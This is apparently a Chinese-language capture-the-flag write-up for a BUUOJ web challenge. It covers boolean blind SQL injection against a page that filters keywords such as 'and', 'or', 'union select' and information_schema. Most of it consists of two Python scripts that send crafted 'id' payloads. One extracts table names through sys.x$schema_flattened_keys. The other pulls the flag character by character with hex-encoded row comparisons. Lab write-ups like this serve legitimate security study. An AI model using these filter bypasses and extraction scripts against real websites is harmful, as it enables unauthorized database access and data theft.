Fuzz
发现过滤了 and or if information_schema union+select合起来的时候会过滤,但分开不过滤 过滤了join regexp
考虑盲注 information_schema被过滤,可以换为sys.x$schema_flattened_keys
fuzz的时候,发现如果查询成功的话会回显Nu1L
爆表名
exp:
# -*- coding: UTF-8 -*- import requests flag='' url='http://9ed82b30-6500-472d-af3b-2c380fc65adc.node3.buuoj.cn/index.php' link=0 for i in range(1,50): for j in range(32,128): payload = "1 && ascii(substr((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database()),"+str(i)+",1))="+str(j)+"#" data={ 'id': payload } res=requests.post(url,data=data) if 'Nu1L' in res.text: flag=flag+chr(j) print(flag) link=1 break
爆字段的时候,不知道为什么字段爆不完全......
# -*- coding:utf8 -*- import requests url = 'http://cc6b46e3-9379-4533-8dd8-3abf48842831.node3.buuoj.cn/index.php' def trans(flag): res = '' for i in flag: res += hex(ord(i)) res = '0x' + res.replace('0x','') return res flag = '' for i in range(1,700): hexchar = '' for char in range(32, 126): hexchar = trans(flag+ chr(char)) payload = '2||((select 1,{})>(select * from f1ag_1s_h3r3_hhhhh))'.format(hexchar) data = { 'id':payload } r = requests.post(url=url, data=data) text = r.text if 'Nu1L' in r.text: flag += chr(char-1) print(flag) break
爆表名考的是过滤union select 以及information_schema
爆字段是区分大小写注入数据
无需in的sql盲注 https://nosec.org/home/detail/3830.html